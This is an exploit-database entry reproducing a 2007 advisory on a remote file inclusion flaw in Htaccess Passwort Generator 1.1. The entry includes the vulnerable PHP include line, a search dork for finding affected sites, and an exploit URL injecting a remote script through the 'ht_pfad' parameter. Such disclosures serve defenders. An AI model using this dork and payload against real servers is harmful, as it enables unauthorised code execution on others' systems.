header-logo
Suggest Exploit
vendor:
Htaccess Passwort Generator
by:
kezzap66345
7.5
CVSS
HIGH
Htaccess Password Generator Exploit
CWE
Product Name: Htaccess Passwort Generator
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Htaccess_gen_V[1].1.1_(C)

This exploit allows an attacker to execute arbitrary code by injecting a malicious script through the 'ht_pfad' parameter in the 'generate.php' file.

Mitigation:

Update to a patched version of the software or remove the vulnerable component.
Source

Exploit-DB raw data:

********Htaccess_gen_V[1].1.1_(C)**********
Htaccess Passwort Generator V.1.1
Discovered By:- kezzap66345
Download:http://www.virtualsystem.de/downloads/index.php?mekat=PHP_Scripte&seite=2
dork:ht_gen.php

code:

include ($ht_pfad."/tpl/ok.html");

exploit
http://target/[path]/generate.php?ht_pfad=3vil script?
I am a Turk..

# milw0rm.com [2007-02-16]

Navigation

Suggest Exploit

Services By CQR